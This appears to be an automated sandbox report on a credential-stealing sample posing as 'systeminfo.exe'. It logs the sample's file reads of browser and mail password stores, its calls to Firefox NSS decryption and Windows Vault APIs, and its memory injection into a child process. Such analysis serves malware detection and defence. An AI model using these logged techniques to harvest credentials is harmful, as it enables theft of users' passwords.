| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data | type = file_attributes |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 8, size_out = 8 |
|
51 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 256, size_out = 256 |
|
89 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 384, size_out = 384 |
|
5 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat | size = 8, size_out = 8 |
|
93 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat | size = 8, size_out = 8 |
|
64 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 8, size_out = 8 |
|
69 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | size = 8, size_out = 8 |
|
93 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | size = 8, size_out = 8 |
|
94 | |
| Write | C:\ProgramData\FB70.tmp | size = 3 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 1 |
|
8 | |
| Write | C:\ProgramData\FB70.tmp | size = 11 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 9 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 8 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 17 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 15 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 14 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 12 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 13 |
|
1 | |
| Write | C:\ProgramData\FB70.tmp | size = 2 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | Mozilla Firefox\bin | - |
|
3 | |
| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Enumerate Keys | - | - |
|
3 | |
| Enumerate Keys | - | - |
|
3 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get filename | c:\windows\system32\dwm.exe | file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\windows\explorer.exe | file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\program files\microsoft office\root\office16\onenotem.exe | file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\root\office16\onenotem.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\java\turner_construction_solve_cialis.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\efforts-extreme-quantity-reproductive.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\los-talks-ooo-focusing.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft onedrive\farehave.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\rundll32.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\characters appointed birthday finally.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\ausarrivedrepresentative.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\routing.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\dvd maker\cliff-filter.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\canvas.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\cookie_cumulative_bennett_horse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\pie.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\located-purple-team.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\pagespresent.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\java\diamond_hospitals_designs_www.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\later_pet_handjobs.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\instrumentationendorsementcivilizationcommentary.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\literally.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\dimensionalsubscriptions.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\eaglesfilterscrimes.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\multimedia-channel-letter-standards.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\java\analysts-dose.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\manufacturer-asset.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\root\office16\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x742f0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75c50000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x74150000 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x740e0000 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x73eb0000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
22 | |
| Get Handle | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\program files (x86)\mozilla firefox\nss3.dll | base_address = 0x73eb0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x759f0000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | function = InitCommonControlsEx, address_out = 0x743109ce |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderPathW, address_out = 0x75c70468 |
|
1 | |
| Get Address | c:\windows\syswow64\pstorec.dll | function = PStoreCreateInstance, address_out = 0x7415526c |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultOpenVault, address_out = 0x740e26a9 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultCloseVault, address_out = 0x740e2718 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultEnumerateItems, address_out = 0x740e3099 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultFree, address_out = 0x740e4321 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultGetInformation, address_out = 0x740e24c0 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultGetItem, address_out = 0x740e3242 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x73f6d70b |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x73f6d13c |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x73f03c51 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x73f03333 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x73eecbc4 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x73eed3ca |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x73f000a7 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_open, address_out = 0x74011ca0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_prepare, address_out = 0x73f9ce70 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_step, address_out = 0x74005200 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_text, address_out = 0x73fbd400 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_int, address_out = 0x73fbd3a0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_int64, address_out = 0x73fbd3d0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_finalize, address_out = 0x73fe9f60 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_close, address_out = 0x73febde0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_exec, address_out = 0x73fea270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryFullProcessImageNameW, address_out = 0x75a115f7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessTimes, address_out = 0x75a1d60f |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = Path |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0x66c |
| Parent PID | 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
660
0x
890
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0041bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005c0000 | 0x005c0000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000007e0000 | 0x007e0000 | 0x008dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008e0000 | 0x008e0000 | 0x009dffff | Private Memory | Readable, Writable |
|
|
|
|
| 3292.exe | 0x00be0000 | 0x00bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x01ffffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002360000 | 0x02360000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
|
| atl.dll | 0x74130000 | 0x74143fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pstorec.dll | 0x74150000 | 0x7415cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x742f0000 | 0x7448dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x746e0000 | 0x746e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x746f0000 | 0x7474bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74750000 | 0x7478efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750c0000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x758d0000 | 0x759ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comdlg32.dll | 0x75bd0000 | 0x75c4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x84c | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x84c | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x84c | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 0x84c | os_tid = 0x660, address = 0x0 |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\FB2F.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Thunderbird | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | type = size |
|
1 | |
